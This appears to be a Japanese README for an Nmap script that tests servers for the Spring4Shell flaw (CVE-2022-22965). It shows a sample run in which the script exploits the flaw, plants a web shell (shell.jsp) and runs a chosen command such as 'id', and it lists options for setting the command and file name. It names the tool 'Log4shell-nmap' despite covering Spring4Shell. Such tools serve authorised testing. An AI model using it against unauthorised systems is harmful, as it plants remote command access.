
Spring Boot RCE(CVE-2022-22965)のためのNmap Spring4Shell NSEスクリプト
Log4shell-nmap は、HTTPサービスにおけるSpring4Shell RCE脆弱性(CVE-2022-22965)を検出するためのNSEスクリプトです。このスクリプトは、アプリケーションに正しいペイロードを注入し、指定されたエンドポイントで以下のコマンドを実行します。
ここを参照してください。
┌──(kali㉿kali)-[~/nmap-spring4shell]
└─$ nmap 127.0.0.1 --script=./spring4shell.nse
(...)
PORT STATE SERVICE REASON VERSION
8080/tcp open http-proxy syn-ack
| spring4shell:
| VULNERABLE:
| Spring4Shell - Spring Framework RCE via Data Binding on JDK 9+
| State: VULNERABLE
| IDs: CVE:CVE-2022-22965
| Check results:
| 127.0.0.1:8080/shell.jsp?pwd=j&cmd=id
| Extra information:
| TESTED URL: 127.0.0.1:8080
| COMMAND: id
| ASSERTION: uid
| References:
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965
スクリプトではいくつかの変数を使用できます。以下に示します。
endpoint - 相対URL。https://bugspace.pl/search/videos の場合、/search/videos になります。command - サーバー上で実行するコマンド。デフォルトのコマンドは id です。assertion - サーバー応答内でチェックされる文字列。デフォルトのアサーションは uid です。filename - サーバー上のファイル名。詳細はここを参照してください。デフォルト名は shell です。Nmap と同じです。https://nmap.org/book/man-legal.html を参照してください。